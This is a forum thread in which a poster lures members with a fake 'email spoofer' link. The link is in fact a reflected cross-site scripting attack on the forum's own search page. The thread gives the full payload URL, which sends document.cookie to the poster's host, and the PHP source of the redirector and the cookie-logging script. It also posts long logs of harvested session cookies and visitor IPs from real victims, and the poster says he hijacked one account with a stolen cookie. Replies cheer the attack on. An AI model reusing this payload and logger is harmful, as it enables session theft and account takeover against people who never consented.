xymon
+ Reply to Thread
Results 1 to 11 of 11

Thread: Test my email spoofer

  1. #1
    Join Date
    Sep 2005
    Posts
    2,050

    Test my email spoofer

    I signed up a fake account on netfast.org to share some files anonymously, and today coded an email spoofer to test their php hosting. Please test this tool and report to me any problems with it, and I will make more web-tools if this works ok.

    [url]http://a5e6sf5.netfast.org/newpage.php[/url]

  2. #2
    Join Date
    Sep 2006
    Posts
    32
    Um, that link just redirects to the all-net tools forum.

  3. #3
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by tocksarcle
    Um, that link just redirects to the all-net tools forum.
    Are you sure? It worked for me when I tried it...

  4. #4
    Join Date
    Jan 2005
    Posts
    623
    Do you like your cookies served with milk?

    This is the same method myspace spammers use to hijack sessions and create fake post like "GET *000 FRIEND INSTANTLY" Once a user logged onto myspace goes to this website and tries to "GET *000 FRIENDS INSTANTLY" it creates a bulletin for that user saying "GET *000 FRIENDS INSTANTLY"... And the cycle begins ~ Quick way to make a few bucks using google ads though
    Last edited by SyntaXmasteR; 09-13-2006 at 01:46 PM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  5. #5
    Join Date
    Sep 2005
    Posts
    2,050
    Haha, ok, well I admit there was no email spoofer, or indeed any 'website'.

    Two days ago I tried to search this website and realised that they don't filter any input on the search. I spent a few minutes examining the source code after a search, and noticed that between the '<title>' and '</title>' tags, user input is displayed without any server-side modifications. So, if you enter this code in the search box:

    </title></head><body><script>alert("xss hole here");</script>

    Or any other query preceded by '</title></head><body>', you can enter custom code into the user's browser who clicks the link. Two minutes later, I sign up a netfast account to test this and coded two simple php scripts to automate things. Once a user clicks the link to 'newpage.php', this happens:

    Link -> newpage.php -> all-nettools.com search with exploit -> write.php -> all-nettools.com/forum/

    The link takes them to newpage.php on my website, newpage.php redirects them to the malicious URL, that redirects them to write.php on my website with 'ck' variable set as their cookie, write.php writes their info to a text file, and they are redirected to the forum index. Here is the full URL I used:

    http://www.all-nettools.com/cgi-bin/search.cgi?q=</title></head><body><script>window.location="http://a5e6sf5.netfast.org/write.php?ck="%2bdocument.cookie;</script>&cmd=Search



    [PHP]newpage.php source:

    <?php
    header("Location: http://www.all-nettools.com/cgi-bin/search.cgi?q=</title></head><body><script>window.location=\"http://a5e6sf5.netfast.org/write.php?ck=\"%2bdocument.cookie;</script>&cmd=Search");
    ?>[/PHP]

    [PHP]write.php source:

    <?php
    $text = "\r\n\r\n-> Date: " . date('r') . "\r\n-> User's IP Address: " . $_SERVER["REMOTE_ADDR"] . "\r\n-> Referrer: " . $_SERVER['HTTP_REFERER'] . "\r\n-> User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n-> Cookie:\r\n\r\n" . $_GET["ck"] . " \r\n\r\n============================================================================================ ===========================";
    $filehandle = fopen("[FILENAMEREMOVED]", "a");
    fwrite($filehandle, $text);
    fclose($filehandle);
    header("Location: http://www.all-nettools.com/forum/index.php");
    ?>[/PHP]

    Here is the file which accumulated the cookie information (my IP address and users' password hashes have been removed):

    Code:
    -> Date:               Tue, *2 Sep 2006 *6:55:*7 -0400
    -> User's IP Address:  [REMOVED]
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (X**; U; Linux i686; en-US; rv:*.8.0.6) Gecko/20060728 SUSE/*.5.0.6-*.* Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=8; bbsessionhash=*62ef*c00**4b7d4f7*be6**d6e6f**5; bblastvisit=**58088*4*; bblastactivity=0; bbthread_lastview=7*d622b0e4*65a27*ce76a76e04240eea-2-{i-**7*_i-**580**82*_i-**80_i-**580*45*8_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:06:*8 -0400
    -> User's IP Address:  64.*2.**6.*2
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; AOL *.0; Windows NT 5.*; SV*; .NET CLR *.*.4*22)
    -> Cookie:
    
    
    bbstyleid=8; bblastvisit=**578*8*46; bblastactivity=0; bbuserid=72*4; bbpassword=[REMOVED]; bbsessionhash=d50aead*27ccf**b2*d*f7c6*e547ec8; bbthread_lastview=d8fdaa2cdb0f*8dbf58ec*68*7b5fbe4a-2-{i-*7**_i-**5807*886_i-**80_i-**580*45*8_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:07:*4 -0400
    -> User's IP Address:  64.*2.**6.202
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; AOL *.0; Windows NT 5.*; SV*; .NET CLR *.*.4*22)
    -> Cookie:
    
    bbstyleid=8; bblastvisit=**578*8*46; bblastactivity=0; bbuserid=72*4; bbpassword=[REMOVED]; bbsessionhash=*65a65*b6*afb70a*bdc80*ed*78*a5a; bbthread_lastview=d8fdaa2cdb0f*8dbf58ec*68*7b5fbe4a-2-{i-*7**_i-**5807*886_i-**80_i-**580*45*8_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:*2:*5 -0400
    -> User's IP Address:  207.*72.*2*.8
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.7.*2) Gecko/20050**5 Firefox/*.0.7
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**50*52508; bblastactivity=0; bbthread_lastview=4704*42*525fa*a*57*7*cef*d8564bda-*-{i-**80_i-**580*45*8_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:*2:*0 -0400
    -> User's IP Address:  207.*72.*2*.8
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.7.*2) Gecko/20050**5 Firefox/*.0.7
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**50*52508; bblastactivity=0; bbthread_lastview=4704*42*525fa*a*57*7*cef*d8564bda-*-{i-**80_i-**580*45*8_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:*2:42 -0400
    -> User's IP Address:  207.*72.*2*.8
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.7.*2) Gecko/20050**5 Firefox/*.0.7
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**50*52508; bblastactivity=0; bbthread_lastview=4704*42*525fa*a*57*7*cef*d8564bda-*-{i-**80_i-**580*45*8_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:*6:*5 -0400
    -> User's IP Address:  207.*72.*2*.8
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.7.*2) Gecko/20050**5 Firefox/*.0.7
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**50*52508; bblastactivity=0; bbthread_lastview=4704*42*525fa*a*57*7*cef*d8564bda-*-{i-**80_i-**580*45*8_}; bbsessionhash=b6ecedc77ef5c*b*7b7fbe*ea4*6*f4e 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:*0:56 -0400
    -> User's IP Address:  7*.68.4.25
    -> Referrer:           
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**580*6656; bblastactivity=0 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:**:08 -0400
    -> User's IP Address:  7*.68.4.25
    -> Referrer:           
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**580*6656; bblastactivity=0 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *7:*2:*8 -0400
    -> User's IP Address:  7*.68.4.25
    -> Referrer:           
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**580*6656; bblastactivity=0 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *8:04:0* -0400
    -> User's IP Address:  *56.*4.2*7.***
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*)
    -> Cookie:
    
    bbstyleid=*; bbsessionhash=*cc672*e4e4*6c207*0ecaaebe57f877; bblastvisit=**580*7062; bblastactivity=0; bbforum_view=d6*f*888*a0b*0f85c*286*6a78a6ba4a-2-{i-4_i-**580*864*_i-*_i-**580*8650_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 *8:04:05 -0400
    -> User's IP Address:  *56.*4.2*7.***
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*)
    -> Cookie:
    
    bbstyleid=*; bbsessionhash=*cc672*e4e4*6c207*0ecaaebe57f877; bblastvisit=**580*7062; bblastactivity=0; bbforum_view=d6*f*888*a0b*0f85c*286*6a78a6ba4a-2-{i-4_i-**580*864*_i-*_i-**580*8650_} 
    
    =======================================================================================================================


    CONTINUED...
    Last edited by Ezekiel; 09-13-2006 at 02:30 PM.

  6. #6
    Join Date
    Sep 2005
    Posts
    2,050
    Code:
    -> Date:               Tue, *2 Sep 2006 **:*2:*2 -0400
    -> User's IP Address:  82.52.*2.20*
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*; SV*)
    -> Cookie:
    
    bbstyleid=8; bbsessionhash=6d7bd48c*ce0*4*0f*db4**04b*44c5f; bblastvisit=**58*02748; bblastactivity=0 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 **:**:0* -0400
    -> User's IP Address:  82.52.*2.20*
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*; SV*)
    -> Cookie:
    
    bbstyleid=8; bbsessionhash=6d7bd48c*ce0*4*0f*db4**04b*44c5f; bblastvisit=**58*02748; bblastactivity=0; bbforum_view=875fb8edeafd27006506ac4b*da4*7a*a-2-{i-2_i-**58*02775_i-*_i-**58*02784_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 **:**:0* -0400
    -> User's IP Address:  82.52.*2.20*
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*; SV*)
    -> Cookie:
    
    bbstyleid=8; bbsessionhash=6d7bd48c*ce0*4*0f*db4**04b*44c5f; bblastvisit=**58*02748; bblastactivity=0; bbforum_view=875fb8edeafd27006506ac4b*da4*7a*a-2-{i-2_i-**58*02775_i-*_i-**58*02784_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 **:44:*2 -0400
    -> User's IP Address:  64.2**.*7*.80
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=*; bbsessionhash=*ffc875550280dd0477ab**7fe004*27; bblastvisit=**58*04644; bblastactivity=0; bbforum_view=**6***7*78*2f07f02*e02e8*0*c5*65a-*-{i-*_i-**58*0465*_} 
    
    =======================================================================================================================
    
    -> Date:               Tue, *2 Sep 2006 2*:42:*2 -0400
    -> User's IP Address:  65.2*.*7*.*27
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*; SV*)
    -> Cookie:
    
    bbstyleid=*; bbsessionhash=a0bf*ab***b*afc24f*fbb6d76ffe2ac; bblastvisit=**58**8*00; bblastactivity=0; bbforum_view=24002d70ac45c2*04ab2*ba*a*0f*b8*a-*-{i-*_i-**58**8*2*_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:5*:0* -0400
    -> User's IP Address:  *72.*42.225.**6
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-GB; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=8; bblastactivity=0; bblastvisit=**55658756; bbsessionhash=d48**872**b0*af775ac66d*6**b*24*; bbthread_lastview=*72*508fcc084db*586de5a*28b622*ba-2-{i-**80_i-**58*586*2_i-**8*_i-**58*46502_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:5*:*5 -0400
    -> User's IP Address:  *72.*42.225.**6
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-GB; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=8; bblastactivity=0; bblastvisit=**55658756; bbsessionhash=d48**872**b0*af775ac66d*6**b*24*; bbthread_lastview=*72*508fcc084db*586de5a*28b622*ba-2-{i-**80_i-**58*586*2_i-**8*_i-**58*46502_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:5*:22 -0400
    -> User's IP Address:  *72.*42.225.**6
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-GB; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbstyleid=8; bblastactivity=0; bblastvisit=**55658756; bbsessionhash=d48**872**b0*af775ac66d*6**b*24*; bbthread_lastview=*72*508fcc084db*586de5a*28b622*ba-2-{i-**80_i-**58*586*2_i-**8*_i-**58*46502_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 *2:*5:26 -0400
    -> User's IP Address:  **8.*7.2*.5
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (Windows; U; Windows NT 5.*; en-US; rv:*.8.0.6) Gecko/20060728 Firefox/*.5.0.6
    -> Cookie:
    
    bbsessionhash=*57d***4d87*5abe5cb*f62ed6b***2*; bblastvisit=**58*65*06; bblastactivity=0; bbforum_view=0*7d0*6*6d*c78*2dcf2f0d0*58**a*ca-*-{i-*_i-**58*65***_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:2*:22 -0400
    -> User's IP Address:  65.70.*7*.58
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*)
    -> Cookie:
    
    bblastvisit=**5686*26*; bblastactivity=0; bbstyleid=*; bbsessionhash=be4deb8676255cf0*8ed5b8676e0ee7a; bbthread_lastview=2**a8*b67cbc*70***77a*2*7*6*d***a-*-{i-**80_i-**58*586*2_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:2*:*4 -0400
    -> User's IP Address:  65.70.*7*.58
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*)
    -> Cookie:
    
    bblastvisit=**5686*26*; bblastactivity=0; bbstyleid=*; bbsessionhash=be4deb8676255cf0*8ed5b8676e0ee7a; bbthread_lastview=2**a8*b67cbc*70***77a*2*7*6*d***a-*-{i-**80_i-**58*586*2_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:*0:*5 -0400
    -> User's IP Address:  *2.*66.2*0.*45
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV*)
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**57**868*; bblastactivity=0; bbsessionhash=6dda2d4c*d2f0*fb2*b**a78a4cdb404; bbthread_lastview=cb72*fc428a85**8*f2e2e**77f4c*a7a-4-{i-**7*_i-**580**82*_i-**8*_i-**58***078_i-**84_i-**58*2858*_i-**80_i-**58*586*2_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:*0:5* -0400
    -> User's IP Address:  *2.*66.2*0.*45
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV*)
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**57**868*; bblastactivity=0; bbsessionhash=6dda2d4c*d2f0*fb2*b**a78a4cdb404; bbthread_lastview=cb72*fc428a85**8*f2e2e**77f4c*a7a-4-{i-**7*_i-**580**82*_i-**8*_i-**58***078_i-**84_i-**58*2858*_i-**80_i-**58*586*2_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:*0:58 -0400
    -> User's IP Address:  *2.*66.2*0.*45
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV*)
    -> Cookie:
    
    bbstyleid=*; bblastvisit=**57**868*; bblastactivity=0; bbsessionhash=6dda2d4c*d2f0*fb2*b**a78a4cdb404; bbthread_lastview=cb72*fc428a85**8*f2e2e**77f4c*a7a-4-{i-**7*_i-**580**82*_i-**8*_i-**58***078_i-**84_i-**58*2858*_i-**80_i-**58*586*2_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 **:56:44 -0400
    -> User's IP Address:  [REMOVED]
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/body%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (X**; U; Linux i686; en-US; rv:*.8.0.6) Gecko/20060728 SUSE/*.5.0.6-*.* Firefox/*.5.0.6
    -> Cookie:
    
    bbsessionhash=*c*4400fd4*5*74*787a7*277*8*7c42; bblastvisit=**58*5*6*2; bblastactivity=0; bbstyleid=*; bbthread_lastview=d46a4*8*a*dd600**fa45f8*fd0*6dfaa-*-{i-**80_i-**58*68885_} 
    
    =======================================================================================================================
    CONTINUED...

  7. #7
    Join Date
    Sep 2005
    Posts
    2,050
    Code:
    -> Date:               Wed, ** Sep 2006 *4:05:** -0400
    -> User's IP Address:  8*.*5*.***.2**
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*; SV*; Preload_0*_07)
    -> Cookie:
    
    bbsessionhash=*26704*2a*05d64cd**4a*cb2***e2a*; bblastvisit=**58*68**4; bblastactivity=0; bbstyleid=*; bbforum_view=b5b40288f7f2*67d764fe8a*f*a*75cfa-*-{i-*_i-**58*70**7_}; bbthread_lastview=b0*cdc*b2db7c54*4e2c0a7f60658f**a-2-{i-**86_i-**58*6*428_i-**80_i-**58*68885_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 *4:05:50 -0400
    -> User's IP Address:  8*.*5*.***.2**
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*; SV*; Preload_0*_07)
    -> Cookie:
    
    bbsessionhash=*26704*2a*05d64cd**4a*cb2***e2a*; bblastvisit=**58*68**4; bblastactivity=0; bbstyleid=*; bbforum_view=b5b40288f7f2*67d764fe8a*f*a*75cfa-*-{i-*_i-**58*70**7_}; bbthread_lastview=b0*cdc*b2db7c54*4e2c0a7f60658f**a-2-{i-**86_i-**58*6*428_i-**80_i-**58*68885_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 *4:06:*2 -0400
    -> User's IP Address:  8*.*5*.***.2**
    -> Referrer:           
    -> User Agent:         Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.*; SV*; Preload_0*_07)
    -> Cookie:
    
    bbsessionhash=*26704*2a*05d64cd**4a*cb2***e2a*; bblastvisit=**58*68**4; bblastactivity=0; bbstyleid=*; bbforum_view=b5b40288f7f2*67d764fe8a*f*a*75cfa-*-{i-*_i-**58*70**7_}; bbthread_lastview=b0*cdc*b2db7c54*4e2c0a7f60658f**a-2-{i-**86_i-**58*6*428_i-**80_i-**58*68885_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 *4:0*:04 -0400
    -> User's IP Address:  [REMOVED]
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/head%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (X**; U; Linux i686; en-US; rv:*.8.0.6) Gecko/20060728 SUSE/*.5.0.6-*.* Firefox/*.5.0.6
    -> Cookie:
    
    bbsessionhash=*c*4400fd4*5*74*787a7*277*8*7c42; bblastvisit=**58*5*6*2; bblastactivity=0; bbstyleid=*; bbthread_lastview=d46a4*8*a*dd600**fa45f8*fd0*6dfaa-*-{i-**80_i-**58*68885_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 *4:0*:*8 -0400
    -> User's IP Address:  [REMOVED]
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/head%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (X**; U; Linux i686; en-US; rv:*.8.0.6) Gecko/20060728 SUSE/*.5.0.6-*.* Firefox/*.5.0.6
    -> Cookie:
    
    bbsessionhash=*c*4400fd4*5*74*787a7*277*8*7c42; bblastvisit=**58*5*6*2; bblastactivity=0; bbstyleid=*; bbthread_lastview=d46a4*8*a*dd600**fa45f8*fd0*6dfaa-*-{i-**80_i-**58*68885_} 
    
    =======================================================================================================================
    
    -> Date:               Wed, ** Sep 2006 *4:*0:*6 -0400
    -> User's IP Address:  [REMOVED]
    -> Referrer:           http://www.all-nettools.com/cgi-bin/search.cgi?q=%*C/title%*E%*C/head%*E%*Cbody%*E%*Cscript%*Ewindow.location=%22http://a5e6sf5.netfast.org/write.php?ck=%22%2bdocument.cookie;%*C/script%*E&cmd=Search
    -> User Agent:         Mozilla/5.0 (X**; U; Linux i686; en-US; rv:*.8.0.6) Gecko/20060728 SUSE/*.5.0.6-*.* Firefox/*.5.0.6
    -> Cookie:
    
    bbsessionhash=*c*4400fd4*5*74*787a7*277*8*7c42; bblastvisit=**58*5*6*2; bblastactivity=0; bbstyleid=*; bbthread_lastview=d46a4*8*a*dd600**fa45f8*fd0*6dfaa-*-{i-**80_i-**58*68885_} 
    
    =======================================================================================================================
    One thing I need to say is this was not for malicious purposes - it was simply to test if it worked, prove how insecure most websites are, and to post back results here. I have no desire to steal the passwords of forum users, it was just an experiment. I was going to notify the admins of this website, but I get the feeling they don't reply to emails.

    To anybody who clicked that link - I will never log into your account other than to test the cookie and I will not read any private messages, but of course you will not believe me so I advise you to change your password now., and you can be free from paranoia. But of all the people who clicked the link, so far only one was a logged-in user. I will post below with that account to confirm this.

    Oh, and the tools I used can be seen below:
    • Firefox
    • GFTP
    • A Text Editor
    • Add 'n Edit Cookies (firefox extension)
    • Netfast.org Account

    I simply looked at the cookie log file then used the firefox extension to add two cookie values, bbpassword and bbuserid, each with info from the user.
    Last edited by Ezekiel; 09-13-2006 at 02:42 PM.

  8. #8
    Join Date
    Aug 2006
    Posts
    233
    Account hacked by mike*0*.

  9. #9
    Join Date
    Mar 2006
    Posts
    122
    Very awesome.
    Im logged on there * times..
    Oh well,

    T

  10. #10
    Join Date
    Sep 2006
    Posts
    6
    pretty remarkable

  11. #11
    Join Date
    Jan 2006
    Posts
    153
    nice job man, proving once again that the simple act of clicking a link can often be your downfall.. it doesnt even have to be in php, simple js can also suffice as well.

    rock on!

+ Reply to Thread

Similar Threads

  1. E-mail spoofer
    By Whitecrow in forum Internet Privacy
    Replies: 14
    Last Post: 06-10-2012, 10:57 AM
  2. E-Mail spoofer
    By homers in forum Internet Privacy
    Replies: 1
    Last Post: 02-16-2007, 04:24 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts